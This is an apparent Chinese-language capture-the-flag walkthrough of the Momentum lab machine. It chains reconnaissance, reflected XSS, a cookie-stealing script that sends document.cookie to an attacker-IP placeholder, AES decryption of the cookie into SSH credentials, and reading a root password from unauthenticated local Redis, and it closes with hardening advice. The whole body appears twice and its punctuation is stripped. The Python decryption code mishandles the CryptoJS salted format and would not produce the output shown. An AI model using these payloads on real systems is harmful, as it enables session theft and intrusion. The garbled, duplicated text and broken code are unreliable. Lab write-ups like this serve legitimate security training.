Kali实战从XSS漏洞到Redis提权的完整渗透路径解析在网络安全领域渗透测试能力的提升往往依赖于真实环境的演练。本文将深入剖析一个典型的多层漏洞利用案例展示如何从简单的XSS漏洞发现开始逐步深入直至获取系统最高权限。整个过程不仅涉及常见漏洞的识别与利用更包含多个技术环节的巧妙串联为安全从业者提供一套完整的实战思路。1. 环境准备与初始侦察任何渗透测试都始于充分的环境准备和系统侦察。在这个阶段我们需要建立测试环境并收集目标系统的初步信息。测试环境配置要点攻击机Kali Linux 2023.3IP: 192.168.9.7靶机MomentumIP: 192.168.9.78网络模式Host-Only确保两机互通提示在实际测试中建议使用VirtualBox或VMware的快照功能便于随时回滚到初始状态。初始扫描使用nmap进行全端口探测这是了解目标暴露面的第一步nmap -A -sV -T4 -p- 192.168.9.78扫描结果通常包含关键信息端口服务版本信息22SSHOpenSSH 7.9p180HTTPApache 2.4.38通过目录枚举工具dirsearch我们可以发现Web应用的基本结构dirsearch -u http://192.168.9.78 -e php,html,js关键发现包括/js/main.js- 包含前端逻辑/opus-details.php- 动态页面接口多个静态资源目录css、img2. Web应用漏洞分析与利用深入分析Web应用是发现突破口的重点环节。通过对前端代码和交互逻辑的审查往往能找到意想不到的漏洞。2.1 前端代码审计在main.js中发现关键代码片段function viewDetails(str) { window.location.href opus-details.php?idstr; } /* var CryptoJS require(crypto-js); var decrypted CryptoJS.AES.decrypt(encrypted, SecretPassphraseMomentum); */这段代码揭示了两个重要信息opus-details.php接收未过滤的id参数系统使用AES加密且硬编码了密钥SecretPassphraseMomentum2.2 XSS漏洞验证与利用测试opus-details.php的参数处理curl http://192.168.9.78/opus-details.php?idscriptalert(1)/script当页面执行了JavaScript代码确认存在XSS漏洞。更高级的利用方式是窃取Cookiescriptdocument.locationhttp://攻击机IP/cookie.php?cdocument.cookie/script实际获取到的Cookie值U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt2.3 加密数据解密使用之前发现的AES密钥解密Cookiefrom Crypto.Cipher import AES import base64 def decrypt_aes(ciphertext, key): cipher AES.new(key.encode(), AES.MODE_CBC, ivbytes(16)) plaintext cipher.decrypt(base64.b64decode(ciphertext)) return plaintext.decode().strip() decrypted decrypt_aes(U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt, SecretPassphraseMomentum) print(decrypted) # 输出auxerre-alienum##3. 系统权限获取与提升获得有效凭据后渗透测试进入系统层面目标是获取更高权限。3.1 SSH登录与初始枚举使用解密获得的凭据尝试SSH登录ssh auxerre192.168.9.78 # 密码auxerre-alienum##基础信息收集命令及其作用命令用途关键发现sudo -l检查sudo权限无sudo权限find / -perm -us查找SUID程序常见系统程序netstat -tulnp检查网络服务Redis运行在6379端口3.2 Redis未授权访问利用发现本地Redis服务后使用redis-cli进行交互redis-cli -h 127.0.0.1 keys * get rootpass获取到root密码m0mentum-al1enum##直接切换用户su root # 输入获取的密码4. 安全加固建议与思考完成渗透后从防御角度分析漏洞成因和防护措施至关重要。漏洞链分析前端硬编码加密密钥输入参数未过滤导致XSSRedis未设置认证敏感信息明文存储加固方案Web应用层实施严格的输入验证和输出编码避免在前端硬编码敏感信息使用HttpOnly和Secure标记Cookie系统层为Redis配置强密码认证遵循最小权限原则设置用户权限定期更新系统和应用补丁在实际渗透测试项目中这种多层漏洞利用的场景非常典型。关键在于保持敏锐的观察力将各个看似独立的信息点有机串联起来形成完整的攻击路径。
Kali实战:从XSS漏洞到Redis提权,手把手教你攻破Momentum靶机
Kali实战从XSS漏洞到Redis提权的完整渗透路径解析在网络安全领域渗透测试能力的提升往往依赖于真实环境的演练。本文将深入剖析一个典型的多层漏洞利用案例展示如何从简单的XSS漏洞发现开始逐步深入直至获取系统最高权限。整个过程不仅涉及常见漏洞的识别与利用更包含多个技术环节的巧妙串联为安全从业者提供一套完整的实战思路。1. 环境准备与初始侦察任何渗透测试都始于充分的环境准备和系统侦察。在这个阶段我们需要建立测试环境并收集目标系统的初步信息。测试环境配置要点攻击机Kali Linux 2023.3IP: 192.168.9.7靶机MomentumIP: 192.168.9.78网络模式Host-Only确保两机互通提示在实际测试中建议使用VirtualBox或VMware的快照功能便于随时回滚到初始状态。初始扫描使用nmap进行全端口探测这是了解目标暴露面的第一步nmap -A -sV -T4 -p- 192.168.9.78扫描结果通常包含关键信息端口服务版本信息22SSHOpenSSH 7.9p180HTTPApache 2.4.38通过目录枚举工具dirsearch我们可以发现Web应用的基本结构dirsearch -u http://192.168.9.78 -e php,html,js关键发现包括/js/main.js- 包含前端逻辑/opus-details.php- 动态页面接口多个静态资源目录css、img2. Web应用漏洞分析与利用深入分析Web应用是发现突破口的重点环节。通过对前端代码和交互逻辑的审查往往能找到意想不到的漏洞。2.1 前端代码审计在main.js中发现关键代码片段function viewDetails(str) { window.location.href opus-details.php?idstr; } /* var CryptoJS require(crypto-js); var decrypted CryptoJS.AES.decrypt(encrypted, SecretPassphraseMomentum); */这段代码揭示了两个重要信息opus-details.php接收未过滤的id参数系统使用AES加密且硬编码了密钥SecretPassphraseMomentum2.2 XSS漏洞验证与利用测试opus-details.php的参数处理curl http://192.168.9.78/opus-details.php?idscriptalert(1)/script当页面执行了JavaScript代码确认存在XSS漏洞。更高级的利用方式是窃取Cookiescriptdocument.locationhttp://攻击机IP/cookie.php?cdocument.cookie/script实际获取到的Cookie值U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt2.3 加密数据解密使用之前发现的AES密钥解密Cookiefrom Crypto.Cipher import AES import base64 def decrypt_aes(ciphertext, key): cipher AES.new(key.encode(), AES.MODE_CBC, ivbytes(16)) plaintext cipher.decrypt(base64.b64decode(ciphertext)) return plaintext.decode().strip() decrypted decrypt_aes(U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt, SecretPassphraseMomentum) print(decrypted) # 输出auxerre-alienum##3. 系统权限获取与提升获得有效凭据后渗透测试进入系统层面目标是获取更高权限。3.1 SSH登录与初始枚举使用解密获得的凭据尝试SSH登录ssh auxerre192.168.9.78 # 密码auxerre-alienum##基础信息收集命令及其作用命令用途关键发现sudo -l检查sudo权限无sudo权限find / -perm -us查找SUID程序常见系统程序netstat -tulnp检查网络服务Redis运行在6379端口3.2 Redis未授权访问利用发现本地Redis服务后使用redis-cli进行交互redis-cli -h 127.0.0.1 keys * get rootpass获取到root密码m0mentum-al1enum##直接切换用户su root # 输入获取的密码4. 安全加固建议与思考完成渗透后从防御角度分析漏洞成因和防护措施至关重要。漏洞链分析前端硬编码加密密钥输入参数未过滤导致XSSRedis未设置认证敏感信息明文存储加固方案Web应用层实施严格的输入验证和输出编码避免在前端硬编码敏感信息使用HttpOnly和Secure标记Cookie系统层为Redis配置强密码认证遵循最小权限原则设置用户权限定期更新系统和应用补丁在实际渗透测试项目中这种多层漏洞利用的场景非常典型。关键在于保持敏锐的观察力将各个看似独立的信息点有机串联起来形成完整的攻击路径。
